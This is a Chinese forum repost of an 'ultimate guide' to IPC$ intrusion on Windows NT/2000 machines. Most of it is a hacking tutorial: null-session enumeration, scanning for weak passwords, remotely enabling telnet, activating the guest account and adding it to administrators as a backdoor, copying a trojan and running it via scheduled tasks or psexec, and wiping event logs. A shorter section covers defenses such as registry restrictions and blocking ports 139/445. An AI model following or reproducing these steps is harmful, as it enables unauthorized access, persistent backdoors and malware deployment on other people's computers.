kida
初级用户
积分 139
发帖 63
注册 2007-10-20
状态 离线
|
『楼 主』:
DOS下命令-ipc$指南
网管员世界[www.365master.com]
ipc$终极指南
目录 :
一 前言
二 什么是ipc$
三 什么是空会话
四 空会话可以做什么
五 ipc$连接所使用的端口
六 ipc$连接在hack 攻击中的意义
七 ipc$连接失败的常见原因
八 复制文件失败的原因
九 如何打开目标的IPC$共享以及其他共享
十 一些需要shell 才能完成的命令
十一 入侵中可能会用到的相关命令
十二 ipc$完整入侵步骤祥解
十三 如何防范ipc$入侵
十四 ipc$入侵问答精选
十五 结束的话
网管员世界[www.365master.com]
一 前言
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚
至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出
来摆弄。
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触
ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的种种迷惑(你随便找一个
hack 论坛搜一下ipc$,看看存在的疑惑有多少)。因此我参考了网上的一些资
料,教程以及论坛帖子,写了这篇总结性质的文章,想把一些容易混淆,容易迷
惑人的问题说清楚,让大家不要总徘徊在原地!
注意:本文所讨论的各种情况均默认发生在win NT/2000 环境下,win98 将不
在此次讨论之列,而鉴于win Xp 在安全设置上有所提高,个别操作并不适用,
有机会将单独讨论。
二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让
进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以
建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访
问。IPC$是NT/2000 的一项新功能,它有一个特点,即在同一时间内,两个IP
之间只允许建立一个连接。NT/2000 在提供了ipc$功能的同时,在初次安装系统
时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录winnt 或
windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,
但在有意无意中,导致了系统安全性的降低。
平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正
意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:
空会话(Null session)。那么什么是空会话呢?
网管员世界[www.365master.com]
三 什么是空会话
在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0 中是使用挑战响应协议与远程机器建立一个会话的,建
立成功的会话将成为一个安全隧道,建立双方通过它互通信息,这个过程的大致
顺序如下:
1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧
道的建立;
2)服务器产生一个随机的64 位数(实现挑战)传送回客户;
3)客户取得这个由服务器产生的64 位数,用试图建立会话的帐号的口令打乱它,
将结果返回到服务器(实现响应);
4)服务器接受响应后发送给本地安全验证(LSA),LSA 通过使用该用户正确的
口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号,
核实本地发生;如果请求的帐号是一个域的帐号,响应传送到域控制器去核实。
当对挑战的响应核实为正确后,一个访问令牌产生,然后传送给客户。客户使用
这个访问令牌连接到服务器上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程,那么空会话又如何呢?
空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密
码),但根据WIN2000 的访问控制模型,空会话的建立同样需要提供一个令牌,
可是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中不包含用
户信息,因此,这个会话不能让系统间发送加密信息,但这并不表示空会话的令
牌中不包含安全标识符SID(它标识了用户和所属组),对于一个空会话,LSA
提供的令牌的SID 是S-1-5-7,这就是空会话的SID,用户名是:ANONYMOUS LOGON
(这个用户名是可以在用户列表中看到的,但是是不能在SAM 数据库中找到,属
于系统内置的帐号),这个访问令牌包含下面伪装的组:
Everyone
Network
在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的
一切信息。那么建立空会话到底可以作什么呢?
四 空会话可以做什么
网管员世界[www.365master.com]
对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共
享,访问everyone 权限的共享,访问小部分注册表等,并没有什么太大的利用
价值;对2000 作用更小,因为在Windows 2000 和以后版本中默认只有管理员
和备份操作员有权从网络访问到注册表,而且实现起来也不方便,需借助工具。
从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$
入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,
这对于一个老练的黑客已经足够了。以下是空会话中能够使用的具体命令:
1 首先,我们先建立一个空会话(需要目标开放ipc$)
命令:net use \\ip\ipc$ "" /user:""
注意:上面的命令包括四个空格,net 与use 中间有一个空格,use 后面一
个,密码左右各一个空格。
2 查看远程主机的共享资源
命令:net view \\IP
解释:建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开
了共享,可以得到如下类似类似结果:
在 \\*.*.*.*的共享资源
资源共享名 类型 用途 注释
-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。
3 查看远程主机的当前时间
命令:net time \\IP
解释:用此命令可以得到一个远程主机的当前时间。
网管员世界[www.365master.com]
4 得到远程主机的NetBIOS 用户名列表(需要打开自己的NBT)
nbtstat -A IP
用此命令可以得到一个远程主机的NetBIOS 用户名列表(需要你的netbios 支
持),返回如下结果:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37
以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要
注意一点:建立IPC$连接的操作会在EventLog 中留下记录,不管你是否登录成
功。 好了,那么下面我们就来看看ipc$所使用的端口是什么?
五 ipc$所使用的端口
网管员世界[www.365master.com]
首先我们来了解一些基础知识:
1 SMB:(Server Message Block) Windows 协议族,用于文件打印共享的服务;
2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现
基于TCP/IP 协议的NETBIOS 网络互联。
3 在WindowsNT 中SMB 基于NBT 实现,而在Windows2000 中,SMB 除了基于NBT
实现,还可以直接通过445 端口实现。
有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择
了:
对于win2000 客户端来说:
1 如果在允许NBT 的情况下连接服务器时,客户端会同时尝试访问139 和445
端口,如果445 端口有响应,那么就发送RST 包给139 端口断开连接,用455
端口进行会话,当445 端口无响应时,才使用139 端口,如果两个端口都没有响
应,则会话失败;
2 如果在禁止NBT 的情况下连接服务器时,那么客户端只会尝试访问445 端口,
如果445 端口无响应,那么会话失败。由此可见,禁止了NBT 后的win 2000 对
win NT 的共享访问将会失败。
对于win2000 服务器端来说:
1 如果允许NBT, 那么UDP 端口137, 138, TCP 端口 139, 445 将开放;
2 如果禁止NBT,那么只有445 端口开放。
我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远
程服务器没有监听139 或445 端口,ipc$会话是无法建立的。
六 ipc$连接在hack 攻击中的意义
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而
这些信息往往是入侵中必不可少的),如果你能够以某一个具有一定权限的用户
身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,
嘿嘿,那你可就了不得了,基本上可以为所欲为了。不过你也不要高兴的太早,
因为管理员的密码不是那么好搞到的,虽然会有一些粗心的管理员存在弱口令,
但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也
愈加小心了,得到管理员密码将会越来越难的,因此今后你最大的可能就是以极
网管员世界[www.365master.com]
小的权限甚至是没有权限进行连接,甚至在主机不开启ipc$共享时,你根本就
无法连接,你会慢慢的发现ipc$连接并不是万能的,所以不要奢望每次连接都
能成功,那是不现实的。
是不是有些灰心?倒也不用,关键是我们要摆正心态,不要把ipc$入侵当作
终极武器,不要认为它战无不胜,它只是很多入侵方法中的一种,你有可能利用
它一击必杀,也有可能一无所获,这些都是正常的,在黑客的世界里,不是每条
大路都能通往罗马,但总有一条路会通往罗马,耐心的寻找吧!
七 ipc$连接失败的常见原因
以下是一些常见的导致ipc$连接失败的原因:
1 IPC 连接是Windows NT 及以上系统中特有的功能,由于其需要用到Windows NT
中很多DLL 函数,所以不能在Windows 9.x/Me 系统中运行,也就是说只有
nt/2000/xp 才可以相互建立ipc$连接,98/me 是不能建立ipc$连接的;
2 如果想成功的建立一个ipc$连接,就需要对方开启ipc$共享,即使是空连接
也是这样,如果对方关闭了ipc$共享,你将会建立失败;
3 你未启动Lanmanworkstation 服务,它提供网络链结和通讯,没有它你无法发
起连接请求(显示名为:Workstation);
4 对方未启动Lanmanserver 服务,它提供了 RPC 支持、文件、打印以及命名管
道共享,ipc$依赖于此服务,没有它远程主机将无法响应你的连接请求(显示名
为:Server);
5 对方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份;
6 对方禁止了NBT(即未打开139 端口);
7 对方防火墙屏蔽了139 和445 端口;
8 你的用户名或者密码错误(显然空会话排除这种错误);
9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的
双引号可以省略,如果密码为空,可以直接输入两个引号""即可;
10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断
开,需要重新建立连接。
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;
网管员世界[www.365master.com]
错误号51,Windows 无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip 地址错误;目标未开机;目标lanmanserver
服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation 服务未启动或者目标删除
了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个
ipc$,请删除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon 服务未启
动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密
码。
八 复制文件失败的原因
有些朋友虽然成功的建立了ipc$连接,但在copy 时却遇到了这样那样的麻
烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢?
1 盲目复制
这类错误出现的最多,占到50%以上。许多朋友甚至都不知道对方是否有共
享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议大家
在进行复制之前务必用net view \\IP 这个命令看一下对方的共享情况,不要认
为ipc$连接建立成功了就一定有共享文件夹。
2 默认共享判断错误
这类错误也是大家经常犯的,主要有两个小方面:
1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连
接之后马上向admin$之类的默认共享复制文件,导致复制失败。ipc$连接成功
只能说明对方打开了ipc$共享,ipc$共享与默认共享是两码事,ipc$共享是一
个命名管道,并不是哪个实际的文件夹,而默认共享并不是ipc$共享的必要条
件;
2)由于net view \\IP 无法显示默认共享(因为默认共享带$),因此通过这
个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共
享,那么所有向默认共享进行的操作都不能成功;(不过大部分扫描软件在扫弱
口令的同时,都能扫到默认共享目录,可以避免此类错误的发生)
网管员世界[www.365master.com]
3 用户权限不够,包括四种情形:
1)空连接向所有共享(默认共享和普通共享)复制时,大多情况下权限是不够
的;
2)向默认共享复制时,要具有管理员权限;
3)向普通共享复制时,要具有相应权限(即对方事先设定的访问权限);
4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;
还需要说明一点:不要认为administrator 就一定是管理员,管理员名称是可以
改的。
4 被防火墙杀死或在局域网
也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了,导致找不
到文件;还有可能你把木马复制到了局域网内的主机,导致连接失败。因此建议
你复制时要小心,否则就前功尽弃了。
呵呵,大家也知道,ipc$连接在实际操作过程中会出现千奇百怪的问题,上
面我所总结的只是一些常见错误,没说到的,只能让大家自己去体会了。
九 如何打开目标的IPC$共享以及其他共享
目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin
权限的shell,比如telnet,木马等,然后在shell 下执行net share ipc$来开
放目标的ipc$,用net share ipc$ /del 来关闭共享。如果你要给它开共享文
件夹,你可以用net share baby=c:\,这样就把它的c 盘开为共享名为baby 共
享了。
十 一些需要shell 才能完成的命令
看到很多教程这方面写的十分不准确,一些需要shell 才能完成命令就简简
单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell
才能完成的命令:
网管员世界[www.365master.com]
1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在
shell 下完成;
2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell 下完成;
3 运行/关闭远程主机的服务,需要在shell 下完成;
4 启动/杀掉远程主机的进程,也需要在shell 下完成。
十一 入侵中可能会用到的相关命令
请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机
的shell 后,才能向远程主机执行。
1 建立空连接:
net use \\IP\ipc$ "" /user:""
2 建立非空连接:
net use \\IP\ipc$ "psw" /user:"account"
3 查看远程主机的共享资源(但看不到默认共享)
net view \\IP
4 查看本地主机的共享资源(可以看到本地的默认共享)
net share
5 得到远程主机的用户名列表
nbtstat -A IP
6 得到本地主机的用户列表
net user
7 查看远程主机的当前时间
net time \\IP
网管员世界[www.365master.com]
8 显示本地主机当前服务
net start
9 启动/关闭本地服务
net start 服务名 /y
net stop 服务名 /y
10 映射远程共享:
net use z: \\IP\baby
此命令将共享名为baby 的共享资源映射到z 盘
11 删除共享映射
net use c: /del 删除映射的c 盘,其他盘类推
net use * /del /y 删除全部
12 向远程主机复制文件
copy \路径\srv.exe \\IP\共享目录名,如:
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c 盘内
13 远程添加计划任务
at \\ip 时间 程序名,如:
at \\127.0.0.0 11:00 love.exe
注意:时间尽量使用24 小时制;在系统默认搜索路径(比如system32/)下不
用加路径,否则必须加全路径
14 开启远程主机的telnet
这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要
满足四个要求:
1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
网管员世界[www.365master.com]
3)目标开启RemoteRegistry 服务,用户就该ntlm 认证
4)对WIN2K/XP 有效,NT 未经测试
命令格式:OpenTelnet.exe \\server account psw NTLM 认证方式 port
试例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90
15 激活用户/加入管理员组
1 net uesr account /active:yes
2 net localgroup administrators account /add
16 关闭远程主机的telnet
同样需要一个小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \\server account psw
试例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""
17 删除一个已建立的ipc$连接
net use \\IP\ipc$ /del
十二 ipc$完整入侵步骤祥解
其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!
1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan 等,随你的便,
然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设
你现在得到了administrator 的密码为空
2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马
(图形界面),那我们就先走telnet 这条路吧
3 上面开telnet 的命令没忘吧,要用到opentelnet 这个小程序
c:\>OpenTelnet.exe \\192.168.21.* administrator "" 1 90
如果返回如下信息
网管员世界[www.365master.com]
*******************************************************
Remote Telnet Configure, by refdom
Email: refdom@263.net
OpenTelnet.exe
Usage:OpenTelnet.exe \\server username password NTLMAuthor telnetport
*******************************************************
Connecting \\192.168.21.*...Successfully!
NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23
Starting telnet service...
telnet service is started successfully! telnet service is running!
BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
*说明你已经打开了一个端口90 的telnet。
4 现在我们telnet 上去
telnet 192.168.21.* 90
如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样
控制你的肉鸡了,那么做点什么呢?把guest 激活再加入管理组吧,就算留个后
门了
5 C:\>net user guest /active:yes
*将Guest 用户激活,也有可能人家的guest 本来就试活的,你可以用net user
guest 看一下它的帐户启用的值是yes 还是no
6 C:\>net user guest 1234
*将Guest 的密码改为1234,或者改成你喜欢的密码
网管员世界[www.365master.com]
7 C:\>net localgroup administrators guest /add
*将Guest 变为Administrator,这样,即使以后管理员更改了他的密码,我们
也可以用guest 登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止
guest 等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿
上帝保佑Guest。
8 好了,现在我们来走另一条路,给它传个木马玩玩
9 首先,我们先建立起ipc$连接
C:\>net use \\192.168.21.*\ipc$ "" /user:administrator
10 既然要上传东西,就要先知道它开了什么共享
C:\>net view \\192.168.21.*
在 \\192.168.21.*的共享资源
资源共享名 类型 用途 注释
-----------------------------------------------------------
C Disk
D Disk
命令成功完成。
*好了,我们看到对方共享了C,D 两个盘,我们下面就可以向任意一个盘复制文
件了。再次声明,因为用net view 命令无法看到默认共享,因此通过上面返回
的结果,我们并不能判断对方是否开启了默认共享。
11 C:\>copy love.exe \\192.168.21.*\c
已复制 1 个文件
*用这个命令你可以将木马客户端love.exe 传到对方的c 盘下,当然,如果能复
制到系统文件夹下是最好的了,不容易被发现
12 运行木马前,我们先看看它现在的时间
网管员世界[www.365master.com]
net time \\192.168.21.*
\\192.168.21.*的当前时间是 2003/8/22 上午 11:00
命令成功完成
13 现在我们用at 运行它吧,不过对方一定要开了Task Scheduler 服务(允许
程序在指定时间运行),否则就不行了
C:\>at \\192.168.21.* 11:02 c:\love.exe
新加了一项作业,其作业 ID = 1
14 剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将
可以用图形界面去控制远程主机了,如果连接失败,那么它可能在局域网里,也
可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好
放弃了
嗯,好了,两种基本方法都讲了。如果你对上面的操作已经轻车熟路了,也
可以用更高效的套路,比如用CA 克隆guest,用psexec 执行木马,用命令:psexec
\\tergetIP -u user -p paswd cmd.exe 直接获得shell 等,这些都是可以得,
随你的便。不过最后不要忘了把日志清理干净,可以用榕哥的elsave.exe。
讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?
十三 如何防范ipc$入侵
1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)
方法1:
运行regedit,找到如下主键
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把
RestrictAnonymous = DWORD 的键值改为:1
网管员世界[www.365master.com]
如果设置为"1",一个匿名用户仍然可以连接到IPC$共享,但限制通过这种
连接得到列举SAM 帐号和共享等信息;在Windows 2000 中增加了"2",限制所
有匿名访问除非特别授权,如果设置为2 的话,可能会有一些其他问题发生,建
议设置为1。如果上面所说的主键不存在,就新建一个再改键值。
方法2:
在本地安全设置-本地策略-安全选项-在'对匿名连接的额外限制'中做
相应设置
2 禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(重起后默认共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server 服务
net stop server /y (重新启动后server 服务会重新开启)
4)禁止自动打开默认共享(此操作并未关闭ipc$共享)
运行-regedit
server 版:找到如下主键
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Pa
rameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro 版:找到如下主键
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Pa
rameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改
键值。
网管员世界[www.365master.com]
这两个键值在默认情况下在主机上是不存在的,需要自己手动添加。
3 关闭ipc$和默认共享依赖的服务:server 服务
控制面板-管理工具-服务-找到server 服务(右击)-属性-常规-启动类型-选已
禁用
这时可能会有提示说:XXX 服务也会关闭是否继续,因为还有些次要的服务要依
赖于lanmanserver,不要管它。
4 屏蔽139,445 端口
由于没有以上两个端口的支持,是无法建立ipc$的,因此屏蔽139,445 端口同
样可以阻止ipc$入侵。
1)139 端口可以通过禁止NBT 来屏蔽
本地连接-TCP/IT 属性-高级-WINS-选‘禁用TCP/IT 上的NETBIOS’一项
2)445 端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
修改完后重启机器
注意:如果屏蔽掉了以上两个端口,你将无法用ipc$入侵别人。
3)安装防火墙进行端口过滤
网管员世界[www.365master.com]
5 设置复杂密码,防止通过ipc$穷举出密码。
十四 ipc$入侵问答精选
上面说了一大堆的理论东西,但在实际中你会遇到各种各样的问题,因此为
了给予大家最大的帮助,我看好几个安全论坛,找了n 多的帖子,从中整理了一
些有代表性的问答,其中的一些答案是我给出的,一些是论坛上的回复,如果有
什么疏漏和错误,还请包涵。
1.进行ipc$入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器
发现吗?
答:留下记录是一定的,你走后用程序删除就可以了,或者用肉鸡入侵。
2.你看下面的情况是为什么,可以连接但不能复制
net use \\***.***.***.***\ipc$ "密码" /user:"用户名"
命令成功
copy icmd.exe \\***.***.***.***\admin$
找不到网络路径
命令不成功
答:可能有两个原因:
1)你的权限不够,不能访问默认共享;
2)对方没有开启admin$默认共享,不要认为能进行ipc$连接,对方就一定开了
默认共享(很多人都这么以为,误区!!),此时你可以试试别的默认共享或普
通共享,比如c$,d$,c,d 等,如果还是不行,就要看你的权限了,如果是管理员
权限,你可以开telnet,如果能成功,在给它开共享也行。
网管员世界[www.365master.com]
3.如果对方开了IPC$,且能建立空联接,但打开C、D 盘时,都要求密码,我知
道是空连接没有太多的权限,但没别的办法了吗?
答:建议先用流光或者别的什么猜解一下密码,如果猜不出来,只能放弃,毕竟
空连接的能力有限。
4.我已经猜解到了管理员的密码,且已经ipc$连接成功了,但net view \\ip
发现它没开默认共享,我该怎么办?
答:首先纠正你的一个错误,用net view 是无法看到默认共享的。既然你现在
有管理员权限,而且对方又开了ipc$,建议你用opentelnet.exe 这个小程序打
开它的telent,在获得了这个shell 之后,做什么都可以了。
5.ipc$连接成功后,我用下面的命令建立了一个帐户,却发现这个帐户在我自己
的机器上,这是怎么回事?
net uset ccbirds /add
答:ipc$建立成功只能说明你与远程主机建立了通信隧道,并不意味你取得了一
个shell,只有在获得一个shell 之后,你才能在远程建立一个帐户,否则你的
操作只是在本地进行。
6.我已进入了一台肉机,用的管理员帐号,可以看他的系统时间,但是复制程序
到他的机子上却不行,每次都提示“拒绝访问,已复制0 个文件”,是不是对方
有什么服务没开,我该怎么办?
答:不能copy 文件有多个可能,除了权限不够外,还可能是对方c$,d$等默认
管理共享没开,或者是对方为NTFS 文件格式,通过设置,管理员也未必能远程
写文件。既然你有管理员权限,那就开telnet 上去吧,然后在开它的共享。
7.我用Win98 能与对方建立ipc$连接吗?
答:不可以的,要进行ipc$的操作,建议用win2000
8.我用net use \\ip\ipc$ "" /user ""成功的建立了一个空会话,但用nbtstat
-A IP 却无法导出用户列表,这是为什么?
网管员世界[www.365master.com]
答:空会话在默认的情况下是可以导出用户列表的,但如果管理员通过修改注册
表来禁止导出列表,就会出现你所说的情况;或者你自己的NBT 没有打开,
netstat 是建立在NBT 之上的。
9.我建立ipc$连接的时候返回如下信息:‘提供的凭据与已存在的凭据集冲
突’,怎么回事?
答:呵呵,这说明你与目标主机建立了一个以上的ipc$连接,这是不允许的,
把其他的删掉吧:net use \\*.*.*.*\ipc$ /del
10.我在映射的时候出现:
F:\>net use h: \\211.161.134.*\e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事?
答:你也太粗心了吧,这说明你的h 盘正在使用,映射到别的盘符吧!
11.我建立了一个连接f:\>net use \\*.*.*.*\ipc$ "123" /user:"ccbirds" 成
功了,但当我映射时出现了错误,向我要密码,怎么回事?
F:\>net use h: \\*.*.*.*\c$
密码在 \\*.*.*.*\c$ 无效。
请键入 \\*.*.*.*\c$ 的密码:
系统发生 5 错误。
拒绝访问。
答:呵呵,向你要密码说明你当前使用的用户权限不够,不能映射C$这个默认
共享,想办法提升权限或者找管理员的弱口令吧!默认共享一般是需要管理员权
限的。
12.我用superscan 扫到了一个开了139 端口的主机,但为什么不能空连接呢?
网管员世界[www.365master.com]
答:你混淆了ipc$与139 的关系,能进行ipc$连接的主机一定开了139 或445
端口,但开这两个端口的主机可不一定能空连接,因为对方可以关闭ipc$共享.
13.我门局域网里的机器大多都是xp,我用流光扫描到几个administrator 帐号
口令是空,而且可以连接,但不能复制东西,说错误5。请问为什么?
答:xp 的安全性要高一些,在安全策略的默认设置中,对本地帐户的网络登录
进行身份验证的时候,默认为来宾权限,即使你用管理员远程登录,也只具有来
宾权限,因此你复制文件,当然是错误5:权限不够。
14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成
功,可是 net use i: \\192.168.0.2\c
出现请键入 \\192.168.0.2 的密码,怎么回事情呢?
答:虽然你具有管理员权限,但管理员在设置c 盘共享权限时可能并未设置允许
administrator 访问,所以会出现问题。
15.如果自己的机器禁止了ipc$, 是不是还可以用ipc 连接别的机器?
答:可以的。
|
|